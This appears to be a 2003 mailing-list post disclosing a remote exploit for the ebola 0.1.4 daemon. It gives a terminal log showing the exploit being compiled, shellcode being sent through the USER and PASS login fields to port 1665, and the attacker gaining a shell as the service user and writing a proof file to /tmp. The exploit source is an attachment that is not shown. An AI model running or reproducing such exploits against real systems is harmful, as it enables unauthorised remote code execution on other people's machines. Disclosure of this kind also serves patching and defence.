<<< Date Index >>>     <<< Thread Index >>>

ebola 0.1.4 remote exploit



Assuming "ebola" runned by sweep user (uid/gid == 333 :P)

bash-2.05b$ id

uid=333(sweep) gid=333(sweep) gruppi=333(sweep)

bash-2.05b$ pwd

/home/c0wboy/ebola-0.1.4

bash-2.05b$ ./ebola &

[1] 2077

bash-2.05b$ exit

exit

[c0wboy@localhost ebola-0.1.4]$ cd $HOME

[c0wboy@localhost c0wboy]$ gcc 0x333ebola.c -o ebola

[c0wboy@localhost c0wboy]$ ./ebola -d localhost -t 0

--- 0x333ebola => ebola-0.1.4 remote exploit ---

--- Outsiders Se(c)urity Labs 2003 ---

_(0x0)_ Exploiting <localhost:1665> on RedHat 8.0 (Psyche)

_(0x1)_ Connected (!)

_(0x2)_ Sending USER (shellcode_1)

_(0x3)_ Sending PASS (shellcode_2)

(======owned======) (======owned======) (======owned======)

Linux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686
i686 i386 GNU/Linux

uid=333(sweep) gid=333(sweep) groups=333(sweep)

echo "owned!" > /tmp/cya.txt

exit



Pipe rotta

[c0wboy@localhost c0wboy]$ ls -al /tmp/cya.txt

-rw-rw-r-- 1 sweep sweep 7 dic 9 17:44 /tmp/cya.txt

[c0wboy@localhost c0wboy]$ cat /tmp/cya.txt

owned!

[c0wboy@localhost c0wboy]$

*Note* exploit is very unstable.

Attachment: 0x333ebola.c
Description: Binary data